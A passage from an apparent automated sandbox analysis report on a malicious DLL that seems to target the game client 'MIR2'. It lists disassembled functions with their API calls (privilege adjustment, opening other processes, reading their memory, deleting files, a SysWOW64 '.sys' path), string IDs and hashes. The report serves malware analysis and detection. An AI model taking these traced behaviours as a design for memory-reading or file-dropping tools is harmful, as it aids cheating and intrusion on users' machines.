                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Module32_strncmp$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                  • String ID: Bass.acc$Bass.dll$LEGS_M_2$MIR2$M_I_R_2$TxGAME.exe$WdFileClient.dll$mirs
                                                                                  • API String ID: 2699731799-2446103735
                                                                                  • Opcode ID: 99ecc8f0ef09930d67f488820ceeb40a8494284f15f093a3f450818784753268
                                                                                  • Instruction ID: f4cec984906d133201c235e5d4907ac0741937cb3ca098b3745de168f62dce1c
                                                                                  • Opcode Fuzzy Hash: 99ecc8f0ef09930d67f488820ceeb40a8494284f15f093a3f450818784753268
                                                                                  • Instruction Fuzzy Hash: DAB10852D4C10577F71032A25D4AB6B25E94B723CCF0A0434ED19E71B3FF0AEA1991AB
                                                                                  Function 6A6D56C0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,6A6D6504), ref: 6A6D56D5
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,6A6D6504), ref: 6A6D56EB
                                                                                  • CloseHandle.KERNEL32(00000000,?,6A6D6504), ref: 6A6D56FC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID: LyDlq$WeDlq$wsdlq
                                                                                  • API String ID: 1378416451-3202960832
                                                                                  • Opcode ID: 6a41c100bd3e4abc804ed4ad2f5bc87f3b36a183cd1135187cd14e1cde596cce
                                                                                  • Instruction ID: 4aca76f72960004303f7ead8ca5aff29b6f3b1bf14b2ceffaf70a7b5db3447f9
                                                                                  • Opcode Fuzzy Hash: 6a41c100bd3e4abc804ed4ad2f5bc87f3b36a183cd1135187cd14e1cde596cce
                                                                                  • Instruction Fuzzy Hash: E8316D72608200ABE311253CAD8DBEB23DEDBC67B6F384635F452CB6D1EF509C0945A1
                                                                                  Function 6A6E1D50 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 125sleepfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E1D90
                                                                                  • _memset.LIBCMT ref: 6A6E1DAA
                                                                                  • _memset.LIBCMT ref: 6A6E1DC4
                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 6A6E1DD9
                                                                                    • Part of subcall function 6A6DAF10: _memset.LIBCMT ref: 6A6DAF34
                                                                                    • Part of subcall function 6A6DAF10: wsprintfA.USER32 ref: 6A6DAFBF
                                                                                  • wsprintfA.USER32 ref: 6A6E1E12
                                                                                    • Part of subcall function 6A6E1A50: _memset.LIBCMT ref: 6A6E1A89
                                                                                    • Part of subcall function 6A6E1A50: _strncpy.LIBCMT ref: 6A6E1AA6
                                                                                  • Sleep.KERNEL32(000003E8), ref: 6A6E1E7A
                                                                                  • DeleteFileA.KERNEL32(?), ref: 6A6E1E88
                                                                                  • GetLastError.KERNEL32 ref: 6A6E1E97
                                                                                  • _memset.LIBCMT ref: 6A6E1EBD
                                                                                  • _memset.LIBCMT ref: 6A6E1ED7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$wsprintf$DeleteDirectoryErrorFileLastSleepWindows_strncpy
                                                                                  • String ID: %s\SysWOW64\%s.sys
                                                                                  • API String ID: 3126029581-2095779045
                                                                                  • Opcode ID: f48bc5a380a1356c1386f5da098fe37c9a3babf3fd4bdf2bfe41d822dc1f20dd
                                                                                  • Instruction ID: fa00612e3e1a3afa8bcb266c5be8da0300f2170f596b39bf2e2802426a708930
                                                                                  • Opcode Fuzzy Hash: f48bc5a380a1356c1386f5da098fe37c9a3babf3fd4bdf2bfe41d822dc1f20dd
                                                                                  • Instruction Fuzzy Hash: 574190B250D3819FD620DB64C995ADFB3E8AB95348F05482DF68983142EF749908CBB3
                                                                                  Function 6A6DBAF0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 119COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6DBB23
                                                                                    • Part of subcall function 6A6DB9C0: WSAStartup.WS2_32 ref: 6A6DBA21
                                                                                    • Part of subcall function 6A6DB9C0: gethostname.WS2_32(?,00000104), ref: 6A6DBA31
                                                                                    • Part of subcall function 6A6DB9C0: __strlwr.LIBCMT ref: 6A6DBA3D
                                                                                  • _memset.LIBCMT ref: 6A6DBB46
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$Startup__strlwrgethostname
                                                                                  • String ID: 1$B$a$e$k$n$s$t$u
                                                                                  • API String ID: 4043451516-1518658690
                                                                                  • Opcode ID: 4171657044395910cdfac7eaf0d0b36c3951353b447967326d763f9d24acb5e1
                                                                                  • Instruction ID: cc50d979cb9afb44175659cb5fbaebb96ed04cd5b6c69f6582ed434cda4d29de
                                                                                  • Opcode Fuzzy Hash: 4171657044395910cdfac7eaf0d0b36c3951353b447967326d763f9d24acb5e1
                                                                                  • Instruction Fuzzy Hash: 6F41C57100C3C58ED301DB649458AEBBBE5AF96348F084A5DE4C887256DF65970CC7E7
                                                                                  Function 6A6D8BD0 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D8CA2
                                                                                  • ReadProcessMemory.KERNEL32(00000000,00C56381,?,00000015,00C52E41), ref: 6A6D8CDF
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D8D12
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$Process$Virtual$AllocateInformationOpenQueryReadSystem$AdjustCloseFreeHandlePrivilege
                                                                                  • String ID: 7$8$:$c$h$k$m$o
                                                                                  • API String ID: 2751502915-258808670
                                                                                  • Opcode ID: f1d2a989006f3ff9e535241d6d9214860878bd37aa1fb52571b59be593ccd17a
                                                                                  • Instruction ID: bbbb7f869f3d419fba647930fad2477a9fe1077e3ec5645bf9d64b5939e0b50c
                                                                                  • Opcode Fuzzy Hash: f1d2a989006f3ff9e535241d6d9214860878bd37aa1fb52571b59be593ccd17a
                                                                                  • Instruction Fuzzy Hash: 5F41E43250D3C19ED341DF68888469FBFE19FE6208F88296DF0C597352D661D609CB67
                                                                                  Function 6A6F2250 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111windownetworkmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FormatMessageA.KERNEL32(00000900,00000000,?,00000800,?,00000000,00000000), ref: 6A6F2296
                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,?,00000000,00000000), ref: 6A6F22AE
                                                                                  • InternetGetLastResponseInfoA.WININET(00002EE3,00000000,00000000), ref: 6A6F22E4
                                                                                  • GetLastError.KERNEL32 ref: 6A6F22EA
                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 6A6F22FA
                                                                                  • InternetGetLastResponseInfoA.WININET(00002EE3,00000000,00000000), ref: 6A6F230F
                                                                                  • LocalFree.KERNEL32(00000000), ref: 6A6F2331
                                                                                    • Part of subcall function 6A6EE27D: __cftof.LIBCMT ref: 6A6EE28E
                                                                                  • LocalFree.KERNEL32(?), ref: 6A6F2356
                                                                                  • FreeLibrary.KERNEL32(?), ref: 6A6F235B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLastLocal$FormatInfoInternetMessageResponse$AllocErrorLibrary__cftof
                                                                                  • String ID: WININET.DLL$.
                                                                                  • API String ID: 908267364-4264371604
                                                                                  • Opcode ID: e6875d6f41707e20f1153106b56919aa192513a5cbe189b66cbd6e907e33165c
                                                                                  • Instruction ID: 8b2899cfab18792d56089c820dc596b9cd77c66433d1f865176f94eb6a31056c
                                                                                  • Opcode Fuzzy Hash: e6875d6f41707e20f1153106b56919aa192513a5cbe189b66cbd6e907e33165c
                                                                                  • Instruction Fuzzy Hash: CF318D72904249BFEB018EA8CC45FAA3BB9EB0A760F150591FD14DA180DB70DE12CFA1
                                                                                  Function 6A6E1F50 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 98fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DBF00: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF26
                                                                                    • Part of subcall function 6A6DBF00: GetProcAddress.KERNEL32(00000000), ref: 6A6DBF2D
                                                                                  • _memset.LIBCMT ref: 6A6E1FD9
                                                                                  • _memset.LIBCMT ref: 6A6E1FED
                                                                                  • DeleteFileA.KERNEL32(?), ref: 6A6E200C
                                                                                    • Part of subcall function 6A6E1BA0: _memset.LIBCMT ref: 6A6E1BC8
                                                                                    • Part of subcall function 6A6E1BA0: _memset.LIBCMT ref: 6A6E1BE2
                                                                                    • Part of subcall function 6A6E1BA0: _memset.LIBCMT ref: 6A6E1BFC
                                                                                    • Part of subcall function 6A6E1BA0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 6A6E1C11
                                                                                    • Part of subcall function 6A6E1BA0: wsprintfA.USER32 ref: 6A6E1C68
                                                                                    • Part of subcall function 6A6E1BA0: DeleteFileA.KERNEL32(?), ref: 6A6E1D18
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$DeleteFile$AddressDirectoryHandleModuleProcWindowswsprintf
                                                                                  • String ID: c6tmassa$l6tbasser.zip$o6saettr.zip$s6paies
                                                                                  • API String ID: 4161225031-2614848092
                                                                                  • Opcode ID: 47a8332910080937d6444d1e8508f6f4f528d40651d2271763d54fd2ecb85114
                                                                                  • Instruction ID: 7b85a83cfd11ad6e8e9a28001b91b2af329dd879ceb9312f62ff48df2e630c03
                                                                                  • Opcode Fuzzy Hash: 47a8332910080937d6444d1e8508f6f4f528d40651d2271763d54fd2ecb85114
                                                                                  • Instruction Fuzzy Hash: 3031F9B140D341AAD720DBB4CC89DDF77E9AB98348F050519F6A892141EF74964C8776
                                                                                  Function 6A6D1B80 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                  • String ID: C:\pl.txt
                                                                                  • API String ID: 3727115324-85274317
                                                                                  • Opcode ID: c21f35f7cc8e793ab98acca1d0a9076186dcab0648eebf0ea2ca78168bce206b
                                                                                  • Instruction ID: 9b2e7814cdcf063a382a9c644e175e8c34ec20f0c581feb07cd9bdfa1b6794aa
                                                                                  • Opcode Fuzzy Hash: c21f35f7cc8e793ab98acca1d0a9076186dcab0648eebf0ea2ca78168bce206b
                                                                                  • Instruction Fuzzy Hash: 27213AB19082117BE210EAA95D18F6B77F95FC2384F07C810FA9497216DEB4E60DC7E2
                                                                                  Function 6A6DDFB0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 78sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DFC70: _memset.LIBCMT ref: 6A6DFC97
                                                                                    • Part of subcall function 6A6DFC70: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 6A6DFCA2
                                                                                    • Part of subcall function 6A6DFC70: Process32First.KERNEL32 ref: 6A6DFCBC
                                                                                    • Part of subcall function 6A6DFC70: Process32Next.KERNEL32(00000000,00000002), ref: 6A6DFCD1
                                                                                    • Part of subcall function 6A6DFC70: CloseHandle.KERNEL32(00000000,00000000,00000002), ref: 6A6DFCDB
                                                                                  • _strncmp.LIBCMT ref: 6A6DDFE2
                                                                                  • _strncmp.LIBCMT ref: 6A6DE000
                                                                                  • _strncmp.LIBCMT ref: 6A6DE01A
                                                                                  • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6A6DE02B
                                                                                    • Part of subcall function 6A6DFC70: CloseHandle.KERNEL32(00000000), ref: 6A6DFD00
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DE045
                                                                                  • OutputDebugStringA.KERNEL32(6A71CCE4), ref: 6A6DE05F
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DE066
                                                                                    • Part of subcall function 6A6DDEC0: OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 6A6DDF1E
                                                                                    • Part of subcall function 6A6DDEC0: __wfopen_s.LIBCMT ref: 6A6DDF37
                                                                                    • Part of subcall function 6A6DDEC0: OutputDebugStringA.KERNEL32(OpenFileMapping failed,75920F00,?,?,?,?,?,?,?,?,?,?,6A6DDFD5,?,00000000,?), ref: 6A6DDF51
                                                                                    • Part of subcall function 6A6DDEC0: OutputDebugStringA.KERNEL32(6A71B18C,?,?,?,?,?,?,?,?,?,?,6A6DDFD5,?,00000000,?,?), ref: 6A6DDF58
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
